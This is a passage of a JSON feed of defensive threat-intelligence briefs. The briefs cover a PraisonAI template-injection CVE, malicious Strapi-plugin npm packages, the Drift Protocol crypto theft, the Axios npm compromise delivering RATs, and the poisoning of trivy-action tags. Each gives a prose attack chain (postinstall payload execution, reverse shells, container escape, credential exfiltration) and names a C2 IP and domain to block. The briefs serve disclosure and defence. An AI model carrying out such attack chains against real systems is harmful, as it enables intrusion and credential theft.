validation opens a significant attack vector, allowing for supply chain compromises. Attackers can inject malicious code into template files, leading to arbitrary code execution within the PraisonAI environment. The vulnerability was reported on April 9, 2026, and patched in version 4.5.128. Defenders should prioritize upgrading to the latest version to mitigate the risk of exploitation via crafted template files.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a PraisonAI instance running a version prior to 4.5.128.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious template file containing arbitrary code. This could involve injecting shell commands or scripts designed to compromise the system.\u003c/li\u003e\n\u003cli\u003eThe attacker hosts the malicious template file on a remote server under their control.\u003c/li\u003e\n\u003cli\u003eThe attacker manipulates PraisonAI to fetch the malicious template file. This could involve exploiting a configuration setting or tricking a user into initiating the download.\u003c/li\u003e\n\u003cli\u003ePraisonAI fetches the template file from the attacker\u0026rsquo;s server without proper validation.\u003c/li\u003e\n\u003cli\u003eThe application treats the template file as trusted executable code.\u003c/li\u003e\n\u003cli\u003eThe malicious code within the template is executed by PraisonAI, leading to arbitrary code execution.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to the PraisonAI system and can perform actions such as data exfiltration, lateral movement, or denial of service.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-40154 can result in a complete compromise of the PraisonAI system. This can lead to unauthorized access to sensitive data, disruption of services, and potential lateral movement within the network. The vulnerable software enables supply chain attacks, making it a critical issue for organizations relying on PraisonAI for their operations. The impact is amplified by the lack of user interaction required for the attack to succeed, with a CVSS v3.1 score of 9.3 highlighting the severity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately upgrade PraisonAI installations to version 4.5.128 or later to patch CVE-2026-40154.\u003c/li\u003e\n\u003cli\u003eImplement network monitoring to detect attempts to fetch template files from untrusted sources, using the network_connection log source and the IOCs if available.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect PraisonAI Template File Download\u0026rdquo; to identify suspicious network connections related to template file retrieval.\u003c/li\u003e\n\u003cli\u003eImplement integrity monitoring on template files if available to detect unauthorized modifications.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T22:16:36Z","date_published":"2026-04-09T22:16:36Z","id":"/briefs/2026-04-praisonai-template-injection/","summary":"PraisonAI before version 4.5.128 is vulnerable to supply chain attacks due to treating remotely fetched template files as trusted executable code without proper verification, enabling exploitation via malicious templates.","title":"PraisonAI Template Injection Vulnerability (CVE-2026-40154)","url":"https://feed.craftedsignal.io/briefs/2026-04-praisonai-template-injection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","npm","strapi","malware"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA threat actor has compromised the Strapi ecosystem by publishing 36 malicious NPM packages posing as legitimate Strapi plugins. This supply chain attack, discovered by SafeDep, targets users of the open-source headless CMS, Strapi, which is built on Node.js. The malicious packages contain a variety of payloads designed to compromise Strapi installations. These payloads include capabilities for Redis code execution, Docker container escape, credential harvesting, reverse shell deployment, and establishing persistent implants. The attackers specifically targeted the cryptocurrency payment gateway Guardarian, indicating a focus on financial gain and data exfiltration from this specific organization. The malicious activity was observed starting around April 6, 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker publishes 36 malicious NPM packages to the NPM registry, using names that mimic legitimate Strapi plugins to entice Strapi developers to install them.\u003c/li\u003e\n\u003cli\u003eA Strapi developer installs one or more of the malicious NPM packages into their Strapi project using the \u003ccode\u003enpm install\u003c/code\u003e command.\u003c/li\u003e\n\u003cli\u003eUpon installation, the malicious package executes its payload, which may include Redis code execution by injecting crontab entries and deploying PHP/Node.js reverse shells.\u003c/li\u003e\n\u003cli\u003eThe payload attempts to escape Docker containers via overlay filesystem discovery, writing shells to host directories and launching a reverse shell.\u003c/li\u003e\n\u003cli\u003eThe malicious code harvests credentials from the compromised system, including database passwords, API keys, JWT secrets, Elasticsearch credentials, and wallet/key files.\u003c/li\u003e\n\u003cli\u003eThe attacker gains a reverse shell on the compromised system, allowing them to execute arbitrary commands and further explore the network.\u003c/li\u003e\n\u003cli\u003eThe malware exfiltrates Strapi configurations and Guardarian API module data to an external attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes persistent implants on the compromised system to maintain long-term access and control.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack can lead to severe consequences for Strapi users, particularly those in the cryptocurrency sector. If successful, the attack allows for unauthorized access to sensitive data, including API keys, database credentials, and customer information. The direct targeting of Guardarian suggests a high-value target with potential for significant financial loss. A successful attack could result in data breaches, financial theft, and reputational damage for affected organizations. The ability to escape Docker containers further broadens the attack surface, potentially compromising the host system and other containers running on the same infrastructure.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Detect Suspicious NPM Package Installation\u0026rdquo; Sigma rule to identify potentially malicious package installations (see rule below).\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command-line arguments to facilitate detection and investigation of suspicious activity.\u003c/li\u003e\n\u003cli\u003eRotate all credentials, including database passwords, API keys, JWT secrets, and other secrets stored on systems where the malicious packages may have been installed, as recommended in the overview.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for reverse shell activity originating from Strapi servers, as described in the Attack Chain (reference network_connection log source in Sigma rules).\u003c/li\u003e\n\u003cli\u003eImplement file integrity monitoring to detect unauthorized modifications to Strapi configuration files and other sensitive files (reference file_event log source in Sigma rules).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-07T10:00:00Z","date_published":"2026-04-07T10:00:00Z","id":"/briefs/2026-04-strapi-npm-attack/","summary":"A threat actor published 36 malicious NPM packages disguised as Strapi plugins in a supply chain attack, designed to execute code, escape containers, harvest credentials, and establish persistent implants on Linux systems targeting Strapi users, with specific focus on the Guardarian cryptocurrency payment gateway.","title":"Malicious NPM Packages Target Strapi Users","url":"https://feed.craftedsignal.io/briefs/2026-04-strapi-npm-attack/"},{"_cs_actors":["UNC4736 (Lazarus Group)"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["drift-protocol","crypto-theft","north-korea","unc4736","lazarus-group","social-engineering","supply-chain"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn April 1st, 2026, the Solana-based trading platform, Drift Protocol, experienced a sophisticated attack resulting in the theft of over $280 million. Investigations by Elliptic and TRM Labs point to North Korean hackers, possibly UNC4736 (also known as AppleJeus and Labyrinth Chollima), a threat actor previously linked to Lazarus. The attackers cultivated a presence within the Drift ecosystem over six months, posing as a quantitative firm. They approached Drift contributors in person at multiple crypto conferences, building trust and rapport. Communications continued via Telegram, where they discussed trading strategies and potential vault integrations, demonstrating technical proficiency and familiarity with Drift\u0026rsquo;s operations. The Telegram group was deleted immediately after the theft.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Reconnaissance:\u003c/strong\u003e The threat actors posed as a quantitative firm to gather information about Drift Protocol and its contributors.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eIn-Person Engagement:\u003c/strong\u003e The actors attended multiple crypto conferences, engaging with specific Drift contributors.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRelationship Building:\u003c/strong\u003e They communicated with targets via Telegram, discussing trading strategies and potential vault integrations.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePotential Compromise:\u003c/strong\u003e Two contributors were potentially compromised via a malicious code repository exploiting a VSCode/Cursor vulnerability allowing silent code execution, or via a malicious TestFlight application presented as a wallet product.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation:\u003c/strong\u003e The attack allowed the hijacking of the Security Council administrative powers.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAsset Draining:\u003c/strong\u003e The attackers drained user assets in approximately 12 minutes.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Removal:\u003c/strong\u003e The Telegram group used for engaging contributors was deleted immediately after the theft.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFunds Laundering:\u003c/strong\u003e The stolen funds were likely transferred to attacker-controlled wallets and prepared for laundering, though the wallets have been flagged across exchanges and bridge operators.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe Drift Protocol suffered a loss of over $280 million, impacting users of the Solana-based trading platform. All Drift Protocol functions remain frozen, and the compromised wallets have been removed from the multisig process. The incident highlights the risks associated with social engineering and the importance of verifying the identities of individuals and organizations interacting with critical infrastructure. The attack has also raised concerns about the security practices within the cryptocurrency sector.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor for unusual network activity and potential exploitation of VSCode/Cursor vulnerabilities via \u003ccode\u003eprocess_creation\u003c/code\u003e and \u003ccode\u003enetwork_connection\u003c/code\u003e logs using the \u0026ldquo;Detect Suspicious VSCode Code Execution\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eMonitor for suspicious applications installed via TestFlight, especially those presented as wallet products, using \u003ccode\u003efile_event\u003c/code\u003e logs and the \u0026ldquo;Detect Suspicious TestFlight Application Installation\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement strict identity verification procedures for individuals and organizations interacting with sensitive systems and data.\u003c/li\u003e\n\u003cli\u003eEducate employees about social engineering tactics and the risks of interacting with unknown individuals or organizations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-06T16:35:39Z","date_published":"2026-04-06T16:35:39Z","id":"/briefs/2026-04-drift-hack/","summary":"The Drift Protocol suffered a $280 million crypto theft orchestrated by North Korean hackers who spent six months building an in-person operational presence within the Drift ecosystem, engaging with contributors at crypto conferences and via Telegram.","title":"Drift Protocol $280M Crypto Theft Linked to North Korean Hackers","url":"https://feed.craftedsignal.io/briefs/2026-04-drift-hack/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","npm","javascript","rat"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 31, 2026, the official Axios node package manager (npm) package was compromised in a supply chain attack. The attack resulted in the deployment of two malicious versions, v1.14.1 and v0.30.4. Axios is a widely-used JavaScript library for making HTTP requests, with approximately 100 million downloads per week. The malicious packages were available for around three hours. The compromised packages introduced a fake runtime dependency, \u0026lsquo;plain-crypto-js\u0026rsquo;, that executes automatically after installation. This dependency then communicates with attacker-controlled infrastructure at 142.11.206.73, pulling down platform-specific payloads for Linux, MacOS, and Windows. The payloads are remote access trojans (RATs), enabling the attackers to gather information and execute additional malicious activities.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromised the Axios NPM package and injected malicious code.\u003c/li\u003e\n\u003cli\u003eMalicious versions v1.14.1 and v0.30.4 were published to the NPM registry.\u003c/li\u003e\n\u003cli\u003eThe malicious packages introduce a fake runtime dependency named \u0026lsquo;plain-crypto-js\u0026rsquo;.\u003c/li\u003e\n\u003cli\u003eUpon installation of the compromised package, the \u0026lsquo;plain-crypto-js\u0026rsquo; dependency executes automatically via a post-install script.\u003c/li\u003e\n\u003cli\u003eThe dependency connects to the attacker-controlled IP address 142.11.206.73 to retrieve a platform-specific payload.\u003c/li\u003e\n\u003cli\u003eOn MacOS, a binary named \u0026ldquo;com.apple.act.mond\u0026rdquo; is downloaded and executed using zsh.\u003c/li\u003e\n\u003cli\u003eOn Windows, a PowerShell script (6202033.ps1) is downloaded, and the legitimate powershell.exe is copied to \u0026ldquo;%PROGRAM DATA%\\wt.exe\u0026rdquo;, and the ps1 script is executed with hidden and execution policy bypass flags.\u003c/li\u003e\n\u003cli\u003eOn Linux, a Python backdoor is downloaded and executed. The downloaded executables act as Remote Access Trojans (RATs) exfiltrating credentials and enabling remote management.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack could lead to significant compromise across numerous organizations using the Axios library. The actors exfiltrate credentials and gain remote management capabilities. All credentials present on systems that installed the malicious package should be considered compromised and immediately rotated. The widespread use of Axios means the impact could extend to many applications and systems, potentially enabling further attacks leveraging compromised credentials. Supply chain attacks like these affecting widely used libraries, as seen in 25% of the top 100 vulnerabilities in the Cisco Talos 2025 Year in Review, highlight the substantial risk they pose.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRoll back to safe Axios versions (v1.14.0 or v0.30.3) immediately to prevent further compromise, as mentioned in the overview.\u003c/li\u003e\n\u003cli\u003eInvestigate systems that downloaded malicious packages (v1.14.1 or v0.30.4) for signs of follow-on payloads from the actor-controlled infrastructure, as described in the overview.\u003c/li\u003e\n\u003cli\u003eBlock the actor-controlled IP address 142.11.206.73 and domain Sfrclak.com at the network perimeter to prevent further communication with the malicious infrastructure, per the IOC list.\u003c/li\u003e\n\u003cli\u003eMonitor for execution of PowerShell scripts from unusual locations, specifically \u0026ldquo;%PROGRAM DATA%\\wt.exe\u0026rdquo;, as part of the attack chain.\u003c/li\u003e\n\u003cli\u003eImplement a process creation rule to alert when processes connect to external IPs using uncommon parent processes. See example rule below.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T12:00:00Z","date_published":"2026-04-04T12:00:00Z","id":"/briefs/2026-04-axios-npm-supply-chain/","summary":"A supply chain attack on the Axios NPM package injected malicious code into versions v1.14.1 and v0.30.4, leading to the deployment of platform-specific remote access trojans (RATs) after the installation of a rogue dependency that communicated with attacker-controlled infrastructure to retrieve malicious payloads for Windows, MacOS, and Linux.","title":"Axios NPM Supply Chain Attack Delivering Platform-Specific RATs","url":"https://feed.craftedsignal.io/briefs/2026-04-axios-npm-supply-chain/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","software-compromise","github"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eIn early 2026, a surge in supply chain attacks has been observed, impacting widely used open-source libraries and tools. Notably, Axios, a popular HTTP client library for JavaScript with 100 million weekly downloads, was maliciously modified. Additionally, the \u0026ldquo;chaos-as-a-service\u0026rdquo; group TeamPCP injected malicious code into hijacked GitHub repositories for open-source projects, including Trivy, a security scanner. The Talos 2025 Year in Review indicated that nearly 25% of the top 100 targeted vulnerabilities affected widely used frameworks and libraries. React2Shell became the top-targeted vulnerability of 2025. These incidents highlight the fragility of the software supply chain and the potential for widespread downstream impact, affecting numerous organizations relying on these compromised components. Defenders face the challenge of identifying and remediating deeply integrated malicious code within their environments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Compromise:\u003c/strong\u003e TeamPCP compromises GitHub repositories of open-source projects like Trivy.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCode Injection:\u003c/strong\u003e Malicious code is injected into the project\u0026rsquo;s codebase within the compromised GitHub repository.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePackage Build and Distribution:\u003c/strong\u003e The compromised code is included in a new version of the software package during the build process.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDistribution via Package Managers:\u003c/strong\u003e The malicious package is distributed through package managers like npm, becoming available for download by developers.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDownstream Consumption:\u003c/strong\u003e Developers unknowingly download and integrate the compromised package into their applications.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExecution in Downstream Environments:\u003c/strong\u003e The malicious code executes within the developers\u0026rsquo; applications and environments.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement/Data Exfiltration/Ransomware:\u003c/strong\u003e The injected code performs malicious actions such as data exfiltration or establishing a reverse shell for lateral movement.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpact:\u003c/strong\u003e The attacker achieves their objectives, such as data theft, system compromise, or ransomware deployment across numerous downstream victims.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of widely used libraries and frameworks like Axios and Trivy can have a vast impact, potentially affecting millions of users and organizations. The Axios library alone receives 100 million downloads weekly. The successful exploitation of the React2Shell vulnerability demonstrates the speed at which these attacks can reach massive scale. The resulting damage can range from data breaches and system compromise to ransomware deployment, affecting organizations across various sectors. The integration of these utilities often makes full cataloging and remediation challenging, leading to prolonged exposure and increased risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSecure CI/CD pipelines to prevent compromises from occurring, addressing the attack vector used by TeamPCP.\u003c/li\u003e\n\u003cli\u003eImplement robust logging to monitor for suspicious activity related to compromised packages and aid in incident response.\u003c/li\u003e\n\u003cli\u003eOrganizations must inventory the software libraries and frameworks they employ and rapidly implement patching and other mitigations when security incidents are reported.\u003c/li\u003e\n\u003cli\u003eImplement robust multi-factor authentication (MFA) to protect developer accounts on platforms like GitHub.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T17:31:42Z","date_published":"2026-04-03T17:31:42Z","id":"/briefs/2026-04-supply-chain-attacks/","summary":"Multiple supply chain attacks, including the compromise of Axios and Trivy via hijacked GitHub repositories by TeamPCP, demonstrate the increasing threat to open-source software.","title":"Rise in Software Supply Chain Attacks Targeting Open-Source Libraries","url":"https://feed.craftedsignal.io/briefs/2026-04-supply-chain-attacks/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","npm","rat","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 31, 2026, a supply chain attack targeted the \u003ccode\u003eaxios\u003c/code\u003e npm package, a widely used HTTP client library for JavaScript. Compromised versions 1.14.1 and 0.30.4 of the library were injected with malicious code that installed a cross-platform Remote Access Trojan (RAT) on systems that installed the affected versions of \u003ccode\u003e@usebruno/cli\u003c/code\u003e. This attack specifically impacted users of the \u003ccode\u003e@usebruno/cli\u003c/code\u003e who performed an \u003ccode\u003enpm install\u003c/code\u003e within a roughly 3-hour window, between 00:21 UTC and 03:30 UTC. The malicious code was designed to execute during the \u003ccode\u003epostinstall\u003c/code\u003e phase of the package installation, indicating a targeted effort to compromise developer environments. This incident highlights the increasing risk of supply chain attacks targeting open-source software and the importance of verifying the integrity of third-party dependencies.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker compromises the \u003ccode\u003eaxios\u003c/code\u003e npm package, injecting malicious code into versions 1.14.1 and 0.30.4.\u003c/li\u003e\n\u003cli\u003eThe compromised \u003ccode\u003eaxios\u003c/code\u003e package is published to the npm registry.\u003c/li\u003e\n\u003cli\u003eA user of \u003ccode\u003e@usebruno/cli\u003c/code\u003e executes \u003ccode\u003enpm install\u003c/code\u003e within the attack window (00:21 UTC - 03:30 UTC on March 31, 2026).\u003c/li\u003e\n\u003cli\u003eThe npm package manager resolves the dependency chain and downloads the compromised \u003ccode\u003eaxios\u003c/code\u003e package as a dependency of \u003ccode\u003e@usebruno/cli\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe malicious code within the \u003ccode\u003eaxios\u003c/code\u003e package executes during the \u003ccode\u003epostinstall\u003c/code\u003e script phase of the installation process.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003epostinstall\u003c/code\u003e script downloads and installs a cross-platform Remote Access Trojan (RAT) on the user\u0026rsquo;s system.\u003c/li\u003e\n\u003cli\u003eThe RAT establishes a connection to a remote command-and-control (C2) server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the RAT to exfiltrate credentials and other sensitive data from the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack could have resulted in widespread compromise of developer systems that used the \u003ccode\u003e@usebruno/cli\u003c/code\u003e. While the number of affected users is unknown, the incident could have led to the exfiltration of sensitive credentials and proprietary source code, potentially enabling further attacks against the affected organizations and their customers. The incident underscores the need for robust security measures in software development pipelines and continuous monitoring of third-party dependencies for malicious activity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eIf \u003ccode\u003e@usebruno/cli\u003c/code\u003e was installed during the affected window, reinstall dependencies to ensure a clean version of \u003ccode\u003eaxios\u003c/code\u003e is used (reference: Impact section).\u003c/li\u003e\n\u003cli\u003eRotate all credentials and secrets that were present on systems where \u003ccode\u003e@usebruno/cli\u003c/code\u003e was installed during the affected window (reference: Impact section).\u003c/li\u003e\n\u003cli\u003eReview and implement the security guidance provided in the Aikido Security blog post to further harden your systems (reference: \u003ca href=\"https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat)\"\u003ehttps://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat)\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for unusual processes spawned by npm or node processes, using the provided Sigma rule (reference: Sigma rule - \u0026ldquo;Detect Suspicious Process Spawned by NPM\u0026rdquo;).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T12:00:00Z","date_published":"2026-04-03T12:00:00Z","id":"/briefs/2026-04-axios-supply-chain/","summary":"Compromised versions of the `axios` npm package introduced a hidden dependency deploying a cross-platform Remote Access Trojan (RAT), impacting users of `@usebruno/cli` who ran `npm install` between 00:21 UTC and ~03:30 UTC on March 31, 2026, potentially leading to credential exfiltration.","title":"Compromised Axios Library Leads to RAT Deployment via @usebruno/cli","url":"https://feed.craftedsignal.io/briefs/2026-04-axios-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","npm","javascript"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 31, 2026 (UTC), the Axios npm package, a popular JavaScript library for making HTTP/S requests used by millions of applications, was targeted in a supply chain attack. A compromised maintainer account was used to publish malicious versions of the package, specifically \u003ca href=\"mailto:axios@1.14.1\"\u003eaxios@1.14.1\u003c/a\u003e and \u003ca href=\"mailto:axios@0.30.4\"\u003eaxios@0.30.4\u003c/a\u003e, between approximately 00:21 and 03:30 UTC. This incident highlights the risks associated with software supply chains and the potential for attackers to inject malicious code into widely used components, impacting countless downstream applications. Defenders should prioritize monitoring their dependencies and implementing measures to detect and prevent such attacks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eCompromise Maintainer Account:\u003c/strong\u003e An attacker gains unauthorized access to the credentials of an Axios npm package maintainer.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePublish Malicious Package Versions:\u003c/strong\u003e The attacker uses the compromised account to publish malicious versions of the Axios package (\u003ca href=\"mailto:axios@1.14.1\"\u003eaxios@1.14.1\u003c/a\u003e and \u003ca href=\"mailto:axios@0.30.4\"\u003eaxios@0.30.4\u003c/a\u003e) to the npm registry.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Resolution:\u003c/strong\u003e Developers or automated build systems unknowingly download and incorporate the malicious Axios versions into their projects during dependency resolution.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMalicious Code Execution:\u003c/strong\u003e The malicious code within the Axios package executes within the context of the affected applications.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation (If Applicable):\u003c/strong\u003e Depending on the vulnerabilities exploited, the attacker may attempt to escalate privileges within the compromised environment.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Exfiltration/Lateral Movement:\u003c/strong\u003e The attacker uses the compromised application as a beachhead to exfiltrate sensitive data or move laterally to other systems on the network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEstablish Persistence:\u003c/strong\u003e The attacker establishes persistent access to the compromised environment to maintain control.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAchieve Objectives:\u003c/strong\u003e The attacker achieves their ultimate objectives, which could include data theft, system disruption, or further compromise of the software supply chain.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack on the Axios npm package has the potential to affect millions of applications that depend on the library. Successful exploitation could lead to data breaches, unauthorized access to systems, and widespread disruption of services. The exact scope of the impact depends on the nature of the malicious code injected into the Axios package and the vulnerabilities it exploits.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor npm package installations for the presence of \u003ca href=\"mailto:axios@1.14.1\"\u003eaxios@1.14.1\u003c/a\u003e and \u003ca href=\"mailto:axios@0.30.4\"\u003eaxios@0.30.4\u003c/a\u003e and investigate any occurrences (refer to the \u003cstrong\u003eOverview\u003c/strong\u003e section).\u003c/li\u003e\n\u003cli\u003eImplement integrity checks for npm packages to detect unauthorized modifications to dependencies.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect suspicious process execution within applications using the Axios library (see \u003cstrong\u003erule: \u0026ldquo;Detect Suspicious Process Execution from Axios\u0026rdquo;\u003c/strong\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T21:04:21Z","date_published":"2026-03-31T21:04:21Z","id":"/briefs/2026-03-axios-supply-chain/","summary":"The widely used Axios npm package was compromised via a supply chain attack on March 31, 2026, resulting in the publication of malicious versions through a compromised maintainer account.","title":"Axios npm Package Compromised in Supply Chain Attack","url":"https://feed.craftedsignal.io/briefs/2026-03-axios-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","github-actions","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, CrowdStrike detected a spike in script execution on Linux-based GitHub Actions runners. Investigation traced the activity to a compromise of the aquasecurity/trivy-action GitHub Action, a widely used open-source vulnerability scanner in CI/CD pipelines. The compromise involved retroactively poisoning 76 of the scanner\u0026rsquo;s 77 release tags through git tag repointing. This replaced the legitimate entry point with a multi-stage credential stealer. The malicious code ran before the actual scanner, making the compromise difficult to detect as workflows appeared to complete normally. Aqua Security confirmed the compromise of the Trivy GitHub Action script, setup script, and binary, and removed the malicious artifacts. This supply chain attack highlights the risk of relying on third-party actions in CI/CD pipelines without proper verification and monitoring.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA developer pushes code, opens a pull request, or merges a branch in a repository using the compromised trivy-action.\u003c/li\u003e\n\u003cli\u003eThe GitHub Actions runner executes the workflow, downloading the specified version of the trivy-action. Due to tag repointing, a malicious version of the action is downloaded instead of the legitimate one.\u003c/li\u003e\n\u003cli\u003eThe malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script is executed, which prepends approximately 105 lines of attack code before the original Trivy scanner logic.\u003c/li\u003e\n\u003cli\u003eThe malicious script enumerates process IDs (PIDs) on the runner to identify potential targets.\u003c/li\u003e\n\u003cli\u003eThe script executes a multi-stage credential theft operation, stealing secrets and credentials available within the runner environment.\u003c/li\u003e\n\u003cli\u003eThe legitimate Trivy scanner is executed after the malicious code, masking the compromise as the workflow appears to complete successfully.\u003c/li\u003e\n\u003cli\u003eStolen credentials are exfiltrated to a destination controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to gain unauthorized access to internal infrastructure, cloud resources, or other sensitive systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain compromise affected users of the aquasecurity/trivy-action GitHub Action. The retroactive poisoning of 76 release tags meant that any CI/CD pipeline using those versions of the action was potentially compromised. The impact included the potential theft of sensitive credentials, secrets, and API keys stored within the GitHub Actions runner environment. Successful credential theft could lead to unauthorized access to critical infrastructure, data breaches, and further downstream attacks. The number of affected organizations is unknown, but given the popularity of trivy-action, the scope could be significant.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReview your GitHub Actions workflows for usage of \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e and verify the integrity of the action\u0026rsquo;s code. Consider pinning to specific commit SHAs instead of tags to avoid tag repointing 